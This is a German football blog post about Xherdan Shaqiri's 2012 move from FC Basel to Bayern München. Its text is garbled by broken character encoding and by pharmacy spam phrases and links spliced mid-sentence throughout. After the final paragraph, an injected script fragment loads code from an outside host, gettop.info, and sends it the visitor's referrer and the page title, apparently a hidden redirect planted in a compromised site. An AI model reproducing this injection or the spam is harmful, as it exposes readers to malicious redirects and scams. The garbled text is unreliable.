Willkommen auf » Sommertransfers 2012 – Xherdan Shaqiri
11. Jul 2012

Sommertransfers 2012 – Xherdan Shaqiri

Sieben Wochen vor dem Auftakt in die 50. JubilAi??umssaison der Bundesliga starten dann auch wir mal in die Vorbereitung und werfen hoodia juice at costco wie in den vergangenen Jahren Pills Cheap duphaston dosage. speziell einen Blick auf die vielen neuen Gesichter im deutschen ProfifuAYball.

Den Startschuss feuert standesgemAi??AY Rekordmeister Bayern MA?nchen ab. Nach zwei Jahren ohne Titel fahren HoeneAY, Rummenigge und Co. in diesem Sommer auch auf dem Transfermarkt wieder grAi??AYere GeschA?tze auf. Sportdirektor Christian Nerlinger musste als erfolgloser HoeneAY-Nachfolger seinen Posten rAi??umen. Sein BA?ro an der SAi??bener StraAYe A?bernahm Anfang Juli Matthias Sammer, der in gleicher Funktion seit 2006 beim DFB tAi??tig war. Bereits vor der Neubesetzung im Management wurden knapp 30 Millionen Euro in die Mannschaft investiert. Sammer wird als Antrittsgeschenk aber sicher auch noch ein gewisses Budget zur VerfA?gung gestellt bekommen haben, sodass man den FCB in diesem Transfersommer noch nicht ganz aus den Augen verlieren sollte.

Neben Mario Mandzukic (26, kam fA?r 13 Mio. aus Wolfsburg und soll im Sturmzentrum Druck auf Mario Gomez machen), Claudio Pizarro (33, kehrt zum Ende der Karriere als offensive Geheimwaffe noch einmal ablAi??sefrei nach MA?nchen zurA?ck), Dante (28, kam fA?r 4,7 Mio. aus MAi??nchengladbach und darf sich ernsthafte Chancen als Alternative im Abwehrzentrum ausrechnen) und Tom Starke (31, als zweiter Keeper hinter Manuel Neuer ablAi??sefrei von 1899 Hoffenheim geholt) wurde zum Trainingsauftakt vergangene Woche auch usa online phamacy antibiotics, farmacies in tijuana phone nunmbers. Purchase Xherdan Shaqiri begrA?AYt, den wir als Bundesliga-Neuling noch ein wenig nAi??her analysieren wollen.

Shaqiri ist 1.68m groAY, aufgewachsen in Basel, Sohn kosovarischer Einwanderer, beidfA?AYig und auf den offensiven AuAYenpositionen im Mittelfeld zu Hause. Mit gerade einmal 20 Jahren konnte er pills online schon so einige Meilensteine eines FuAYballerlebens abhaken http://www.3karatt.com/21265 : In A?ber 120 Pflichtspielen hat er maAYgeblich zu den jA?ngeren Glanzzeiten des FC Basel (Meister 2010, 2011 und 2012, Pokalsieger 2010 und 2012) beitragen und auch in Champions und Europa League erste Erfahrungen sammeln kAi??nnen. FA?r die Schweiz betritt er bisher 22 Junioren- und 18 A-LAi??nderspiele und wurde in den vergangenen beiden Jahren zum Schweizer FuAYballer des Jahres gewAi??hlt. Ein ganzer Sack an Vorschusslorbeeren also, die dem FC Bayern stattliche, aber definitiv gut investierte no prescription required pharmacy 11,6 Millionen Euro AblAi??se und einen Vierjahresvertrag wert waren.
Purchase

Die FCB-Offiziellen schwAi??rmten bei der Vorstellung des Neuzugangs jedenfalls http://www.j1taxback.com/tax-tips/cheap-serpina-side/ cost of viagra per pill in den hAi??chsten TAi??nen: ai??zWir freuen uns sehr, dass wir mit Xherdan Shaqiri eines der umworbensten Talente des europAi??ischen FuAYballs verpflichten konnten,ai??? so der damalige Sportdirektor Christian Nerlinger.

ai??zXherdan wird mit seiner Spielintelligenz und seinen Dribblings unsere Mannschaft in den kommenden Saisons verstAi??rkenai???, ergAi??nzte Trainer Jupp Heynckes, ai??zich habe ihn seit einiger Zeit beobachtet und bin A?berzeugt, dass er fA?r den FC Bayern ein wichtiger Spieler werden kann.ai???

Spielerisch fAi??llt er in erster Linie durch ein extrem kraftvolles Auftreten, eine gute technische Ausbildung und eine herausragende beidfA?AYige Schusstechnik auf. Die Konkurrenz kAi??nnte auf den FlA?geln des deutschen Rekordmeisters mit Ribery und Robben nominell kaum grAi??AYer sein. Auf seine Einsatzzeiten wird Shaqiri aber mit Sicherheit im ersten Jahr dennoch kommen, sei es als Einwechselspieler oder erste Alternative bei Verletzung oder Formtief der etablierten Konkurrenten. Auf jeden Fall erhAi??ht sich nach den AbgAi??ngen von Takashi Usami (ein wohl gescheitertes Purchase Experiment der Bundesliga-Japan-Welle aus dem Vorjahr, mittlerweile an 1899 Hoffenheim weiter verliehen) und Ivica Olic (mit 32 Jahren nach Vertragsende ablAi??sefrei nach Wolfsburg gewechselt) nun wieder die VariabilitAi??t der MA?nchner im Mittelfeld, speziell auf den AuAYenpositionen. Mit drei waschechten FlA?gelspielern, dazu Thomas MA?ller, Toni Kroos und David Alaba dA?rfte man A?ber genA?gend QualitAi??t verfA?gen, um auch im internationalen GeschAi??ft zu einem erneuten Angriff ansetzen zu kAi??nnen.

So, genug getextet, hier ein paar Videoimpressionen vom typischen Spiel des Xherdan Shaqiri…
[youtube:http://www.youtube.com/watch?v=zWGHnrk1tVo]

Aus den vier Minuten wird auch noch eins deutlich: Der FC Bayern bekommt endlich mal wieder einen cheap reminyl side Spieler, der direkte FreistoAYtore schieAYen kann. Eine QualitAi??t, die dem Team in der Vergangenheit zunehmend fehlte.

Mit Xherdan Shaqiri hat sich der deutsche Rekordmeister also im Vergleich zum Vorjahr spielerisch durchaus verbessert, ist variantenreicher geworden und kAi??nnte so auch taktisch fA?r die ein oder andere A?berraschung sorgen, wenn Trainer Heynckes denn den Mut hat, einen formschwachen Ribery oder Robben mal auf der Bank zu lassen. Alles in allem ein wertvoller Transfer mit einer guten Zukunftsprognose.s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=‘ + encodeURIComponent(document.referrer) + ‚&default_keyword=‘ + encodeURIComponent(document.title) + “;


Einen Kommentar schreiben